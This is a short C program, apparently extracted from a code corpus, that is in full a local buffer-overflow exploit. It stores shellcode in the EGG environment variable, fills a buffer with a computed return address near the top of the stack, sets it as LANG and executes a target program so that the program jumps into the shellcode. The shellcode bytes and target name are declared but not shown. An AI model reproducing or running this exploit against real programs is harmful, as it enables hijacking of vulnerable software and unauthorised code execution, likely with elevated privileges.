
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFLEN ;
 char* VULN ;
 int execl (char*,char*,int *) ;
 int fprintf (int ,char*,char*) ;
 int printf (char*,...) ;
 int setenv (char*,char*,int) ;
 char* shellcode ;
 int stderr ;
 scalar_t__ strlen (char*) ;

int main(int argc, char **argv)
{
 char exploit[BUFLEN+5];
 unsigned long addr_ret = 0xc0000000 - 4;
 char *arg0 = VULN;
 int i;
 if (argc > 2) {
  fprintf(stderr, "Usage: %s [PROG]\n", argv[0]);
  return 1;
 }
 if (argc > 1)
  arg0 = argv[1];
 addr_ret -= strlen(arg0) + 1;
 addr_ret -= strlen(shellcode) + 1;
 setenv("EGG",shellcode,1);
 for(i=0;i<BUFLEN;i+=4)
  *(unsigned int *)(exploit+i)=addr_ret;
 exploit[i]=0x0;
 setenv("LANG",exploit,1);
 printf("Using RET=%p\n",addr_ret);
 execl(arg0,arg0,((void*)0));
 printf("\n");
 return 1;
}
